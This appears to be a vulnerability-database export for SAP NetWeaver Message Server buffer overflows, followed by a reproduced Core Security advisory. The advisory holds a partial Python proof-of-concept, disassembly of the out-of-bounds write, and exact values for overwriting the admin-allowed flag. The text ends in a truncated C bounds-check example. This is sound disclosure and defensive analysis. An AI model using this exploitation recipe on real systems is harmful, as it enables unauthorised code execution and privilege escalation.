        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1395",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "54231",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-539",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "78143",
        "trust": 0.4
      },
      {
        "db": "IVD",
        "id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "db": "BID",
        "id": "78143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "id": "VAR-201208-0222",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      }
    ],
    "trust": 1.87111164
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 1.6
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      }
    ]
  },
  "last_update_date": "2024-07-23T22:37:43.393000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SAP has issued an update to correct this vulnerability.",
        "trust": 1.4,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "title": "Acknowledgments to Security Researchers",
        "trust": 0.8,
        "url": "http://scn.sap.com/docs/doc-8218"
      },
      {
        "title": "SAP NetWeaver",
        "trust": 0.8,
        "url": "http://www.sap.com/platform/netweaver/businessbenefits/customdevelopment.epx"
      },
      {
        "title": "SAP has issued an update to correct this vulnerability.",
        "trust": 0.7,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
      },
      {
        "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/18435"
      },
      {
        "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/18434"
      },
      {
        "title": "SAP NetWeaver ABAP Fixes for multiple stack-based buffer errors",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=209631"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2012-4341 "
      },
      {
        "title": "cve-search",
        "trust": 0.1,
        "url": "https://github.com/r3p3r/cve-search "
      },
      {
        "title": "cve-search-src",
        "trust": 0.1,
        "url": "https://github.com/extremenetworks/cve-search-src "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/zien-tf/z_iot_cve-search-api "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/pgurudatta/cve-search "
      },
      {
        "title": "cve-search",
        "trust": 0.1,
        "url": "https://github.com/cve-search/cve-search "
      },
      {
        "title": "cve-search",
        "trust": 0.1,
        "url": "https://github.com/dim0niu/cve-search "
      },
      {
        "title": "cve-search",
        "trust": 0.1,
        "url": "https://github.com/swastik99/cve-search-master "
      },
      {
        "title": "cve",
        "trust": 0.1,
        "url": "https://github.com/zwei2008/cve "
      },
      {
        "title": "cve-search",
        "trust": 0.1,
        "url": "https://github.com/miradam/cve-search "
      },
      {
        "title": "modified_cve-search",
        "trust": 0.1,
        "url": "https://github.com/hr-cert/modified_cve-search "
      },
      {
        "title": "cve-search",
        "trust": 0.1,
        "url": "https://github.com/swastik99/cve-search "
      },
      {
        "title": "cve-search-ng",
        "trust": 0.1,
        "url": "https://github.com/cve-search/cve-search-ng "
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "trust": 2.0,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/"
      },
      {
        "trust": 2.0,
        "url": "https://service.sap.com/sap/support/notes/1649838"
      },
      {
        "trust": 2.0,
        "url": "http://www.securitytracker.com/id?1027211"
      },
      {
        "trust": 2.0,
        "url": "http://scn.sap.com/docs/doc-8218"
      },
      {
        "trust": 2.0,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/"
      },
      {
        "trust": 2.0,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/49744"
      },
      {
        "trust": 1.3,
        "url": "https://websmp230.sap-ag.de/sap%28bd1lbizjptawmq==%29/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4341"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4341"
      },
      {
        "trust": 0.7,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2012/jun/186"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2012/jun/185"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/54229"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2012-4341"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.securityfocus.com/bid/78143"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/cve-search/cve-search"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "db": "BID",
        "id": "78143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "db": "BID",
        "id": "78143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-07-02T00:00:00",
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "date": "2012-06-27T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "date": "2012-08-15T00:00:00",
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "date": "2012-08-15T00:00:00",
        "db": "BID",
        "id": "78143"
      },
      {
        "date": "2012-08-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "date": "2012-08-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      },
      {
        "date": "2012-08-15T21:55:05.353000",
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "date": "2012-06-27T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "date": "2022-10-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "date": "2012-08-15T00:00:00",
        "db": "BID",
        "id": "78143"
      },
      {
        "date": "2012-08-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "date": "2022-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      },
      {
        "date": "2023-11-07T02:11:50.587000",
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      }
    ],
    "trust": 0.6
  }
}

VAR-202001-0832

Vulnerability from variot - Updated: 2024-07-23 22:37

A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04.

The vulnerability is due to a memory pointer error while processing certain packets by the affected software.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

CORE-2012-1128

  1. Advisory Information

Title: SAP Netweaver Message Server Multiple Vulnerabilities
Advisory ID: CORE-2012-1128
Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities
Date published: 2013-02-13
Date of last update: 2013-02-13
Vendors contacted: SAP
Release mode: Coordinated release

  2. Vulnerability Information

Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1592, CVE-2013-1593

  3. Vulnerability Description

By sending different messages, the different vulnerabilities can be triggered.

  4. Vulnerable packages

  . SAP Netweaver 2004s
  . SAP Netweaver 7.01 SR1
  . SAP Netweaver 7.02 SP06
  . SAP Netweaver 7.30 SP04
  . Older versions are probably affected too, but they were not checked.

  5. Non-vulnerable packages

  . Vendor did not provide this information.

  6. Vendor Information, Solutions and Workarounds

SAP released the security note 1800603 [2] regarding these issues.

  7. Credits

Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

  8. Technical Description / Proof of Concept Code

The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900)
(options, args) = parser.parse_args()

client_string = '-'+' '*39
server_name = '-'+' '*39

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize_connection(hostname, port):

    # Connect
    print "[*] Connecting to", hostname, "port", port
    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection.connect((hostname, port))

    # Send initialization packet
    print "[*] Connected, sending login request"

    init = '**MESSAGE**\x00' # eyecatcher
    init+= '\x04' # version
    init+= '\x00' # errorno
    init+= client_string # toname
    init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    init+= '\x01\x08' # flag / iflag (MS_LOGIN_2)
    init+= client_string # fromname
    init+= '\x00\x00' # padd
    send_packet(connection, init)

    # Receive response
    print "[*] Receiving login reply"
    (length, data) = receive(connection)

    # Parsing login reply
    server_name = data[4+64:4+64+40]

    return connection

# Main PoC body
connection = initialize_connection(options.hostname, options.port)
send_attack(connection)
-----/

In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.

8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.

The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:

/-----
00000000 MSJ2EE_HEADER   struct ; (sizeof=0x28, standard type)
00000000 senderclusterid dd ?
00000004 clusterid       dd ?
00000008 serviceid       dd ?
0000000C groupid         dd ?
00000010 nodetype        db ?
00000011                 db ? ; undefined
00000012                 db ? ; undefined
00000013                 db ? ; undefined
00000014 totallength     dd ?
00000018 currentlength   dd ?
0000001C currentoffset   dd ?
00000020 totalblocks     db ?
00000021 currentblock    db ?
00000022                 db ? ; undefined
00000023                 db ? ; undefined
00000024 messagetype     dd ?
00000028 MSJ2EE_HEADER   ends
-----/

The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':

/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0                              ; DATA XREF: _MsJ2EE_AddStatistics+24o
.data:0090B9E0                              ; _MsJ2EE_AddStatistics+4Co ...
-----/

This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:

/-----
mov     edi, [ebp+pJ2eeHeader]
mov     eax, [edi+MSJ2EE_HEADER.serviceid]           ; attacker controls MSJ2EE_HEADER.serviceid
xor     ecx, ecx
cmp     dword ptr j2ee_stat_total.totalMsgCount+4, ecx
lea     esi, [eax+eax*8]
lea     esi, j2ee_stat_services.totalMsgCount[esi*8]  ; using the index without validating array bounds
-----/

Since the 'serviceid' value is first multiplied by 9 and then by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:

/-----
00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)
00000000                           ; XREF: .data:j2ee_stat_totalr
00000000                           ; .data:j2ee_stat_servicesr
00000000 totalMsgCount      dq ?   ; XREF: _MsJ2EE_AddStatistics+1Br
00000000                           ; _MsJ2EE_AddStatistics+2Fr ...
00000008 totalMsgLength     dq ?   ; XREF: _MsJ2EE_AddStatistics+192r
00000008                           ; _MsJ2EE_AddStatistics+19Br ...
00000010 avgMsgLength       dq ?   ; XREF: _MsJ2EE_AddStatistics+1C2w
00000010                           ; _MsJ2EE_AddStatistics+1C7w ...
00000018 maxLength          dq ?   ; XREF: _MsJ2EE_AddStatistics+161r
00000018                           ; _MsJ2EE_AddStatistics+16Er ...
00000020 noP2PMessage       dq ?   ; XREF: _MsJ2EE_AddStatistics:loc_44D442w
00000020                           ; _MsJ2EE_AddStatistics+158w ...
00000028 noP2PRequest       dq ?   ; XREF: _MsJ2EE_AddStatistics+144w
00000028                           ; _MsJ2EE_AddStatistics+14Aw ...
00000030 noP2PReply         dq ?   ; XREF: _MsJ2EE_AddStatistics+132w
00000030                           ; _MsJ2EE_AddStatistics+138w ...
00000038 noBroadcastMessage dq ?   ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw
00000038                           ; _MsJ2EE_AddStatistics+123w ...
00000040 noBroadcastRequest dq ?   ; XREF: _MsJ2EE_AddStatistics+10Fw
00000040                           ; _MsJ2EE_AddStatistics+115w ...
00000048 MSJ2EE_STAT_ELEMENT ends
-----/

However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:

/-----
At this point:
  * ESI points to an arbitrary, attacker-controlled memory address
  * EBX == 1

.text:0044D359 movzx   eax, [ebp+msiflag]
.text:0044D35D sub     eax, 0Ch
.text:0044D360 jz      short loc_44D37C
.text:0044D362 sub     eax, ebx
.text:0044D364 jnz     short loc_44D39D
.text:0044D366 cmp     [ebp+msflag], 2
.text:0044D36A jnz     short loc_44D374
.text:0044D36C add     [esi+40h], ebx   ; iflag=0xd, flag=2 => add 1 to [esi+0x40]
.text:0044D36F adc     [esi+44h], ecx
.text:0044D372 jmp     short loc_44D39D
.text:0044D374 ; ----------------------------------------------------------------
.text:0044D374
.text:0044D374 loc_44D374:              ; CODE XREF: _MsJ2EE_AddStatistics+7Aj
.text:0044D374 add     [esi+38h], ebx   ; iflag=0xd, flag=1 => add 1 to [esi+0x38]
.text:0044D377 adc     [esi+3Ch], ecx
.text:0044D37A jmp     short loc_44D39D
.text:0044D37C ; ----------------------------------------------------------------
.text:0044D37C
.text:0044D37C loc_44D37C:              ; CODE XREF: _MsJ2EE_AddStatistics+70j
.text:0044D37C mov     al, [ebp+msflag]
.text:0044D37F cmp     al, 3
.text:0044D381 jnz     short loc_44D38B
.text:0044D383 add     [esi+30h], ebx   ; iflag=0xc, flag=3 => add 1 to [esi+0x30]
.text:0044D386 adc     [esi+34h], ecx
.text:0044D389 jmp     short loc_44D39D
.text:0044D38B ; ----------------------------------------------------------------
.text:0044D38B
.text:0044D38B loc_44D38B:              ; CODE XREF: _MsJ2EE_AddStatistics+91j
.text:0044D38B cmp     al, 2
.text:0044D38D jnz     short loc_44D397
.text:0044D38F add     [esi+28h], ebx   ; iflag=0xc, flag=2 => add 1 to [esi+0x28]
.text:0044D392 adc     [esi+2Ch], ecx
.text:0044D395 jmp     short loc_44D39D
.text:0044D397 ; ----------------------------------------------------------------
.text:0044D397
.text:0044D397 loc_44D397:              ; CODE XREF: _MsJ2EE_AddStatistics+9Dj
.text:0044D397 add     [esi+20h], ebx   ; iflag=0xc, flag=1 => add 1 to [esi+0x20]
.text:0044D39A adc     [esi+24h], ecx

[...]
-----/

And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:

/-----
.text:0044D3B7 add     [esi], ebx                             ; add 1 to [esi]
.text:0044D3B9 adc     dword ptr [esi+4], 0
.text:0044D3BD mov     eax, [edi+MSJ2EE_HEADER.totallength]  ; MSJ2EE_HEADER.totallength is fully controlled by the attacker
.text:0044D3C0 cdq
.text:0044D3C1 add     [esi+8], eax                           ; add an arbitrary number to [esi+8]
-----/

This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.

A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:

/-----
00000000 MSADM_s         struc ; (sizeof=0x538, standard type)
00000000                       ; XREF: .data:dummy_clientr
00000000 client_type     dd ?  ; enum MS_CLIENT_TYPE
00000004 stat            dd ?  ; enum MS_STAT
00000008 connection_ID   dd ?
0000000C status          db ?
0000000D dom             db ?  ; XREF: MsSFillCon+3Cw
0000000E admin_allowed   db ?
0000000F                 db ?  ; undefined
00000010 name            dw 40 dup(?)
[...]
00000534 _padding        db 4 dup(?)
00000538 MSADM_s         ends
-----/

The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:

/-----
.text:004230DC loc_4230DC:                            ; CODE XREF: MsSLoginClient+AAAj
.text:004230DC                                        ; MsSLoginClient+B26j
.text:004230DC cmp     byte ptr [edi+0Eh], 0          ; privileged client?
.text:004230E0 jnz     short loc_4230EA               ; if yes, jump
.text:004230E2 mov     al, byte ptr ms_admin_allowed  ; otherwise, grab the value of the "ms_admin_allowed" global variable...
.text:004230E7 mov     [edi+0Eh], al                  ; ...and save it to MSADM_s.admin_allowed
-----/

So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':

/-----
.data:008F17F0 ; int ms_admin_allowed
.data:008F17F0 ms_admin_allowed dd ?       ; DATA XREF: MsSSetMonitor+7Ew
.data:008F17F0                             ; MsSLoginClient+B62r
-----/

And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':

/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0                              ; DATA XREF: _MsJ2EE_AddStatistics+24o
.data:0090B9E0                              ; _MsJ2EE_AddStatistics+4Co ...
-----/

So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.
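To make the missing check concrete, here is an added C model (not code from the advisory) of the 'serviceid' handling described above: the header offsets, the 0x48-byte slot and the 256-slot table are the ones quoted in the listings, while the type and function names are this example's own. It also reproduces the 32-bit wrap-around that turns 'serviceid == 0x038E3315' into a slot below the table, which is why the index has to be validated before it is scaled rather than after.

```c
/* Added example, not code from the advisory: models the serviceid handling in
 * _MsJ2EE_AddStatistics and the bounds check it lacks.  Header offsets, the
 * 0x48-byte slot and the 256-slot table are taken from the listings above;
 * the function and type names are this example's own. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MSJ2EE_HEADER_SIZE     0x28u  /* sizeof(MSJ2EE_HEADER) */
#define MSJ2EE_OFF_SERVICEID   0x08u
#define MSJ2EE_OFF_TOTALLENGTH 0x14u
#define J2EE_STAT_SERVICES_LEN 256u   /* j2ee_stat_services[256] */

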